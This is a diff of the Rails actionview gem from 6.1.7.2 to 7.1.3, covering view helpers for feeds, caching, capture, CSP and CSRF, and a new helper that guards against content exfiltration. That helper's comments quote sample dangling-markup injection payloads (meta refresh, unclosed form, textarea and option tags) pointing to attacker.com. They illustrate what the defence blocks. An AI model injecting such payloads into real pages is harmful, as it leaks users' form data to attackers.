actionview 6.1.7.2 → 7.1.3

data/lib/action_view/helpers/atom_feed_helper.rb

@@ -1,11 +1,10 @@
 # frozen_string_literal: true
 
 require "set"
-require "active_support/core_ext/symbol/starts_ends_with"
 
 module ActionView
-  # = Action View Atom Feed Helpers
-  module Helpers #:nodoc:
+  module Helpers # :nodoc:
+    # = Action View Atom Feed \Helpers
     module AtomFeedHelper
       # Adds easy defaults to writing Atom feeds with the Builder template engine (this does not work on ERB or any other
       # template languages).
@@ -83,9 +82,9 @@ module ActionView
       #     end
       #
       # The Atom spec defines five elements (content rights title subtitle
-      # summary) which may directly contain xhtml content if type: 'xhtml'
+      # summary) which may directly contain XHTML content if type: 'xhtml'
       # is specified as an attribute. If so, this helper will take care of
-      # the enclosing div and xhtml namespace declaration. Example usage:
+      # the enclosing div and XHTML namespace declaration. Example usage:
       #
       #    entry.summary type: 'xhtml' do |xhtml|
       #      xhtml.p pluralize(order.line_items.count, "line item")
@@ -103,7 +102,7 @@ module ActionView
           options[:schema_date] = "2005" # The Atom spec copyright date
         end
 
-        xml = options.delete(:xml) || eval("xml", block.binding)
+        xml = options.delete(:xml) || block.binding.local_variable_get(:xml)
         xml.instruct!
         if options[:instruct]
           options[:instruct].each do |target, attrs|
@@ -127,7 +126,7 @@ module ActionView
         end
       end
 
-      class AtomBuilder #:nodoc:
+      class AtomBuilder # :nodoc:
         XHTML_TAG_NAMES = %w(content rights title subtitle summary).to_set
 
         def initialize(xml)
@@ -135,7 +134,7 @@ module ActionView
         end
 
         private
-          # Delegate to xml builder, first wrapping the element in an xhtml
+          # Delegate to XML Builder, first wrapping the element in an XHTML
           # namespaced div element if the method and arguments indicate
           # that an xhtml_block? is desired.
           def method_missing(method, *arguments, &block)
@@ -161,7 +160,7 @@ module ActionView
           end
       end
 
-      class AtomFeedBuilder < AtomBuilder #:nodoc:
+      class AtomFeedBuilder < AtomBuilder # :nodoc:
         def initialize(xml, view, feed_options = {})
           @xml, @view, @feed_options = xml, view, feed_options
         end

data/lib/action_view/helpers/cache_helper.rb

@@ -1,9 +1,11 @@
 # frozen_string_literal: true
 
 module ActionView
-  # = Action View Cache Helper
-  module Helpers #:nodoc:
+  module Helpers # :nodoc:
+    # = Action View Cache \Helpers
     module CacheHelper
+      class UncacheableFragmentError < StandardError; end
+
       # This helper exposes a method for caching fragments of a view
       # rather than an entire action or page. This technique is useful
       # caching pieces like menus, lists of new topics, static HTML
@@ -165,8 +167,10 @@ module ActionView
       # expire the cache.
       def cache(name = {}, options = {}, &block)
         if controller.respond_to?(:perform_caching) && controller.perform_caching
-          name_options = options.slice(:skip_digest)
-          safe_concat(fragment_for(cache_fragment_name(name, **name_options), options, &block))
+          CachingRegistry.track_caching do
+            name_options = options.slice(:skip_digest)
+            safe_concat(fragment_for(cache_fragment_name(name, **name_options), options, &block))
+          end
         else
           yield
         end
@@ -174,6 +178,34 @@ module ActionView
         nil
       end
 
+      # Returns whether the current view fragment is within a +cache+ block.
+      #
+      # Useful when certain fragments aren't cacheable:
+      #
+      #   <% cache project do %>
+      #     <% raise StandardError, "Caching private data!" if caching? %>
+      #   <% end %>
+      def caching?
+        CachingRegistry.caching?
+      end
+
+      # Raises +UncacheableFragmentError+ when called from within a +cache+ block.
+      #
+      # Useful to denote helper methods that can't participate in fragment caching:
+      #
+      #   def project_name_with_time(project)
+      #     uncacheable!
+      #     "#{project.name} - #{Time.now}"
+      #   end
+      #
+      #   # Which will then raise if used within a +cache+ block:
+      #   <% cache project do %>
+      #     <%= project_name_with_time(project) %>
+      #   <% end %>
+      def uncacheable!
+        raise UncacheableFragmentError, "can't be fragment cached" if caching?
+      end
+
       # Cache fragments of a view if +condition+ is true
       #
       #   <% cache_if admin?, project do %>
@@ -249,16 +281,27 @@ module ActionView
         controller.read_fragment(name, options)
       end
 
-      def write_fragment_for(name, options)
-        pos = output_buffer.length
-        yield
-        output_safe = output_buffer.html_safe?
-        fragment = output_buffer.slice!(pos..-1)
-        if output_safe
-          self.output_buffer = output_buffer.class.new(output_buffer)
-        end
+      def write_fragment_for(name, options, &block)
+        fragment = output_buffer.capture(&block)
         controller.write_fragment(name, fragment, options)
       end
+
+      module CachingRegistry # :nodoc:
+        extend self
+
+        def caching?
+          ActiveSupport::IsolatedExecutionState[:action_view_caching] ||= false
+        end
+
+        def track_caching
+          caching_was = ActiveSupport::IsolatedExecutionState[:action_view_caching]
+          ActiveSupport::IsolatedExecutionState[:action_view_caching] = true
+
+          yield
+        ensure
+          ActiveSupport::IsolatedExecutionState[:action_view_caching] = caching_was
+        end
+      end
     end
   end
 end

data/lib/action_view/helpers/capture_helper.rb

@@ -3,18 +3,22 @@
 require "active_support/core_ext/string/output_safety"
 
 module ActionView
-  # = Action View Capture Helper
-  module Helpers #:nodoc:
-    # CaptureHelper exposes methods to let you extract generated markup which
+  module Helpers # :nodoc:
+    # = Action View Capture \Helpers
+    #
+    # \CaptureHelper exposes methods to let you extract generated markup which
     # can be used in other parts of a template or layout file.
     #
-    # It provides a method to capture blocks into variables through capture and
-    # a way to capture a block of markup for use in a layout through {content_for}[rdoc-ref:ActionView::Helpers::CaptureHelper#content_for].
+    # It provides a method to capture blocks into variables through #capture and
+    # a way to capture a block of markup for use in a layout through #content_for.
+    #
+    # As well as provides a method when using streaming responses through #provide.
+    # See ActionController::Streaming for more information.
     module CaptureHelper
-      # The capture method extracts part of a template as a String object.
+      # The capture method extracts part of a template as a string object.
       # You can then use this object anywhere in your templates, layout, or helpers.
       #
-      # The capture method can be used in ERB templates...
+      # The capture method can be used in \ERB templates...
       #
       #   <% @greeting = capture do %>
       #     Welcome to my shiny new web page!  The date and time is
@@ -40,11 +44,24 @@ module ActionView
       #
       #   @greeting # => "Welcome to my shiny new web page! The date and time is 2018-09-06 11:09:16 -0500"
       #
-      def capture(*args)
+      def capture(*args, &block)
         value = nil
-        buffer = with_output_buffer { value = yield(*args) }
-        if (string = buffer.presence || value) && string.is_a?(String)
-          ERB::Util.html_escape string
+        @output_buffer ||= ActionView::OutputBuffer.new
+        buffer = @output_buffer.capture { value = yield(*args) }
+
+        string = if @output_buffer.equal?(value)
+          buffer
+        else
+          buffer.presence || value
+        end
+
+        case string
+        when OutputBuffer
+          string.to_s
+        when ActiveSupport::SafeBuffer
+          string
+        when String
+          ERB::Util.html_escape(string)
         end
       end
 
@@ -121,7 +138,7 @@ module ActionView
       #     <li><%= link_to 'Home', action: 'index' %></li>
       #   <% end %>
       #
-      #  And in another place:
+      # And in another place:
       #
       #   <% content_for :navigation do %>
       #     <li><%= link_to 'Login', action: 'login' %></li>
@@ -137,7 +154,7 @@ module ActionView
       #     <li><%= link_to 'Home', action: 'index' %></li>
       #   <% end %>
       #
-      #   <%#  Add some other content, or use a different template: %>
+      #   <%# Add some other content, or use a different template: %>
       #
       #   <% content_for :navigation, flush: true do %>
       #     <li><%= link_to 'Login', action: 'login' %></li>
@@ -172,6 +189,8 @@ module ActionView
       # concatenate several times to the same buffer when rendering a given
       # template, you should use +content_for+, if not, use +provide+ to tell
       # the layout to stop looking for more contents.
+      #
+      # See ActionController::Streaming for more information.
       def provide(name, content = nil, &block)
         content = capture(&block) if block_given?
         result = @view_flow.append!(name, content) if content
@@ -179,6 +198,7 @@ module ActionView
       end
 
       # <tt>content_for?</tt> checks whether any content has been captured yet using <tt>content_for</tt>.
+      #
       # Useful to render parts of your layout differently based on what is in your views.
       #
       #   <%# This is the layout %>
@@ -198,7 +218,7 @@ module ActionView
 
       # Use an alternate output buffer for the duration of the block.
       # Defaults to a new empty string.
-      def with_output_buffer(buf = nil) #:nodoc:
+      def with_output_buffer(buf = nil) # :nodoc:
         unless buf
           buf = ActionView::OutputBuffer.new
           if output_buffer && output_buffer.respond_to?(:encoding)

data/lib/action_view/helpers/content_exfiltration_prevention_helper.rb

@@ -0,0 +1,70 @@
+# frozen_string_literal: true
+
+module ActionView
+  module Helpers
+    module ContentExfiltrationPreventionHelper
+      mattr_accessor :prepend_content_exfiltration_prevention, default: false
+
+      # Close any open attributes before each form tag. This prevents attackers from
+      # injecting partial tags that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <meta http-equiv="refresh" content='0;URL=https://attacker.com?
+      #
+      # The HTML following this tag, up until the next single quote would be sent to
+      # +https://attacker.com+. By closing any open attributes, we ensure that form
+      # contents are never exfiltrated this way.
+      CLOSE_QUOTES_COMMENT = %q(<!-- '"` -->).html_safe.freeze
+
+      # Close any open tags that support CDATA (textarea, xmp) before each form tag.
+      # This prevents attackers from injecting unclosed tags that could capture
+      # form contents.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com"><textarea>
+      #
+      # The HTML following this tag, up until the next <tt></textarea></tt> or
+      # the end of the document would be captured by the attacker's
+      # <tt><textarea></tt>. By closing any open textarea tags, we ensure that
+      # form contents are never exfiltrated.
+      CLOSE_CDATA_COMMENT = "<!-- </textarea></xmp> -->".html_safe.freeze
+
+      # Close any open option tags before each form tag. This prevents attackers
+      # from injecting unclosed options that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com"><option>
+      #
+      # The HTML following this tag, up until the next <tt></option></tt> or the
+      # end of the document would be captured by the attacker's
+      # <tt><option></tt>. By closing any open option tags, we ensure that form
+      # contents are never exfiltrated.
+      CLOSE_OPTION_TAG = "</option>".html_safe.freeze
+
+      # Close any open form tags before each new form tag. This prevents attackers
+      # from injecting unclosed forms that could leak markup offsite.
+      #
+      # For example, an attacker might inject:
+      #
+      #   <form action="https://attacker.com">
+      #
+      # The form elements following this tag, up until the next <tt></form></tt>
+      # would be captured by the attacker's <tt><form></tt>. By closing any open
+      # form tags, we ensure that form contents are never exfiltrated.
+      CLOSE_FORM_TAG = "</form>".html_safe.freeze
+
+      CONTENT_EXFILTRATION_PREVENTION_MARKUP = (CLOSE_QUOTES_COMMENT + CLOSE_CDATA_COMMENT + CLOSE_OPTION_TAG + CLOSE_FORM_TAG).freeze
+
+      def prevent_content_exfiltration(html)
+        if prepend_content_exfiltration_prevention
+          CONTENT_EXFILTRATION_PREVENTION_MARKUP + html
+        else
+          html
+        end
+      end
+    end
+  end
+end

data/lib/action_view/helpers/controller_helper.rb

@@ -3,10 +3,12 @@
 require "active_support/core_ext/module/attr_internal"
 
 module ActionView
-  module Helpers #:nodoc:
+  module Helpers # :nodoc:
+    # = Action View Controller \Helpers
+    #
     # This module keeps all methods and behavior in ActionView
     # that simply delegates to the controller.
-    module ControllerHelper #:nodoc:
+    module ControllerHelper # :nodoc:
       attr_internal :controller, :request
 
       CONTROLLER_DELEGATES = [:request_forgery_protection_token, :params,
@@ -20,6 +22,10 @@ module ActionView
           @_request = controller.request if controller.respond_to?(:request)
           @_config  = controller.config.inheritable_copy if controller.respond_to?(:config)
           @_default_form_builder = controller.default_form_builder if controller.respond_to?(:default_form_builder)
+        else
+          @_request ||= nil
+          @_config ||= nil
+          @_default_form_builder ||= nil
         end
       end
 

data/lib/action_view/helpers/csp_helper.rb

@@ -1,8 +1,8 @@
 # frozen_string_literal: true
 
 module ActionView
-  # = Action View CSP Helper
-  module Helpers #:nodoc:
+  module Helpers # :nodoc:
+    # = Action View CSP \Helpers
     module CspHelper
       # Returns a meta tag "csp-nonce" with the per-session nonce value
       # for allowing inline <script> tags.
@@ -11,7 +11,7 @@ module ActionView
       #     <%= csp_meta_tag %>
       #   </head>
       #
-      # This is used by the Rails UJS helper to create dynamically
+      # This is used by the \Rails UJS helper to create dynamically
       # loaded inline <script> elements.
       #
       def csp_meta_tag(**options)

data/lib/action_view/helpers/csrf_helper.rb

@@ -1,8 +1,8 @@
 # frozen_string_literal: true
 
 module ActionView
-  # = Action View CSRF Helper
-  module Helpers #:nodoc:
+  module Helpers # :nodoc:
+    # = Action View CSRF \Helpers
     module CsrfHelper
       # Returns meta tags "csrf-param" and "csrf-token" with the name of the cross-site
       # request forgery protection parameter and token, respectively.
@@ -16,8 +16,8 @@ module ActionView
       #
       # You don't need to use these tags for regular forms as they generate their own hidden fields.
       #
-      # For AJAX requests other than GETs, extract the "csrf-token" from the meta-tag and send as the
-      # "X-CSRF-Token" HTTP header. If you are using rails-ujs this happens automatically.
+      # For Ajax requests other than GETs, extract the "csrf-token" from the meta-tag and send as the
+      # +X-CSRF-Token+ HTTP header. If you are using rails-ujs, this happens automatically.
       #
       def csrf_meta_tags
         if defined?(protect_against_forgery?) && protect_against_forgery?